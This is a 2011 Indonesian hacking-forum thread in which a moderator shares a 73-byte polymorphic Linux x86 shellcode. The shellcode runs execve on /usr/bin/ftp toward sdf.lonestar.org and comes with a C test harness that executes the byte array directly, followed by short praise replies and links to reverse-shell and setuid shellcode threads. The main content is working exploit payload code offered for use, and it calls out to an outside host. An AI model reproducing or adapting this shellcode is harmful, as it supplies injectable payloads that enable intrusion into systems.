Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 06-20-2013, 01:03 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Programming › C / C++ v
« Previous 1 ... 9 10 11 12 13 ... 15 Next »

73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
10-24-2011, 11:44 PM
Post: #1
syn_attack Away
execl("/bin/sh", "sh", NULL);
**
Moderators
Posts: 308
Joined: Sep 2011
Reputation: 55
73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
kakak-kakaklu sekalian, aku mau share mainanku nih....

ini shellcode untuk membuka jalur transfer file lewat protokol ftp di host sdf.lonestar.org (terutama terimakasih untuk mywisdom untuk dedikasinya selama ini, walaupun secara tidak langsung, saya sering buka blog kakak...... maaf ya kak... wawa wawa)

langsung aja ya kak :

Code:
/* 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL)
* polymorphic shellcode
* Programmer : Paulus Gandung Prakosa_ (0x1337day)
* Thanks to : mywisdom, chaer.newbie, wenkhairu, ketek, gunslinger_,
*             nofia_fitri, xtr0nic, t3k0, tabun, petimati, and all
*             devilzc0de member
*/

#include <stdio.h>
#include <string.h>

char sdf_ftp[] = "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2e"
                 "\x6f\x72\x67\x68\x73\x74\x61\x72\x68\x6c"
                 "\x6f\x6e\x65\x68\x73\x64\x66\x2e\x89\xe6"
                 "\x83\xec\x01\x88\x04\x24\x68\x2f\x66\x74"
                 "\x70\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73"
                 "\x72\x50\x56\x83\xee\x0d\x56\xb0\x0b\x89"
                 "\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31"
                 "\xdb\xcd\x80";

int main(void)
{
    int ftp_len = strlen(sdf_ftp);
    fprintf(stdout, "[+] Length oof the shellcode is : %d\n", ftp_len);
    ((void(*)(void))sdf_ftp)();

    return 0;
}

POC-nya di sini kak...... wawa wawa

http://devilzc0de.org/forum/thread-10737.html

kalau ada yang salah mohon koreksinya ya kak.... bangga
Visit this user's website Find all posts by this user
Quote this message in a reply
10-24-2011, 11:46 PM
Post: #2
th3pRed4t0r Offline
./Devilz 1st Cadet
Posts: 18
Joined: Feb 2011
Reputation: 0
RE: 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
icip-icip om.
:P
Find all posts by this user
Quote this message in a reply
10-25-2011, 12:00 AM
Post: #3
selfdefense Offline
./Devilz Commodore
Posts: 1,294
Joined: Aug 2010
Reputation: 58
RE: 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
ajarin ane bikin shell code gtu dong om.... asik
prasaan dulu jga ane pernah baca om syn bikin polymorph shell code juga... coman dmana y...? monman
Find all posts by this user
Quote this message in a reply
10-25-2011, 12:23 AM
Post: #4
mywisdom Offline
Administrator
*******
Administrators
Posts: 923
Joined: Dec 2009
Reputation: 51
RE: 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
panda:panda: mantap mas bro keep creative ! smangatsmangatsmangat

btw tu tempat nongkrong ane ngakakngakak
Find all posts by this user
Quote this message in a reply
10-25-2011, 01:22 AM
Post: #5
anko_kum4ru Offline
./b0k3p3r_4r34
****
Global Moderators
Posts: 1,456
Joined: Dec 2010
Reputation: 10
RE: 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
mantap
omz syn_attack emang kereenn.... mantap
Visit this user's website Find all posts by this user
Quote this message in a reply
10-25-2011, 02:27 AM
Post: #6
syn_attack Away
execl("/bin/sh", "sh", NULL);
**
Moderators
Posts: 308
Joined: Sep 2011
Reputation: 55
RE: 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
kakak selfdefense ~# hahahahhahahha... mantap
kakak mywisdom ~# makasih ya kak,, mantap
kakak tabun ~# akh, kakak tabun bisa aja....... wawa wawa
Visit this user's website Find all posts by this user
Quote this message in a reply
10-25-2011, 02:35 AM
Post: #7
Deva Offline
^ Biar item tpi Manies ^
**
Moderators
Posts: 357
Joined: Oct 2011
Reputation: 12
RE: 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
blum paham omz dead
Find all posts by this user
Quote this message in a reply
10-25-2011, 03:13 AM
Post: #8
syn_attack Away
execl("/bin/sh", "sh", NULL);
**
Moderators
Posts: 308
Joined: Sep 2011
Reputation: 55
RE: 73 bytes sys_execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) polymorphic shellcode
kakak deva ~# kita sama-sama belajar ya kak deva??? wawa wawa
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] membuat reverse connecting shellcode (pesanan papa schumbag) ack_attack 10 743 04-27-2013 04:47 AM
Last Post: Xr0b0t
  46 bytes execve("/bin//df", "/bin//df", NULL) polymorphic shellcode syn_attack 17 1,750 10-21-2011 10:27 AM
Last Post: syn_attack
  51 bytes FreeBSD/x86 encrypted setuid(0) execve /bin/sh mywisdom 4 803 05-29-2011 01:21 PM
Last Post: Net_Spy

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 06-20-2013, 01:03 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE